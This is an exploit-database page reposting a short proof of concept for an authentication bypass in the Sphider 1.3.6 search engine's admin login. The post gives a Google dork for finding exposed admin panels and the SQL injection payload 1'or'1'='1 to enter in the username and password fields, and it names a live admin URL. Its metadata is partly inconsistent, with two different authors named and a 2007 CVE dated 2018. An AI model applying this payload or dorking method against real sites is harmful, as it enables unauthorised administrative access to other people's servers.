Advertisement






Sphider 1.3.6 Auth By pass Vulnerability

CVE Category Price Severity
CVE-2007-7473 CWE-287 $300 High
Author Risk Exploitation Type Date
Sebastian Cufre Critical Remote 2018-09-05
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018090035

Below is a copy:

Sphider 1.3.6 Auth By pass Vulnerability
====================================================================================================================================
| # Title     : Sphider 1.3.6 Auth By pass Vulnerability                                                                           |
| # Author    : indoushka                                                                                                          |
| # Telegram  : @indoushka                                                                                                         |
| # Tested on : windows 10 Franais V.(Pro)                                                                                        |
| # Vendor    : http://www.sphider.eu/sphider-1.3.6.zip                                                                            |  
| # Dork      : Sphider Admin Login                                                                                                |
====================================================================================================================================


poc :

[+] Dorking n Google Or Other Search Enggine 

[+] use payload 1'or'1'='1 in user & pass

http://www.sphider.eu/admin/admin.php

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum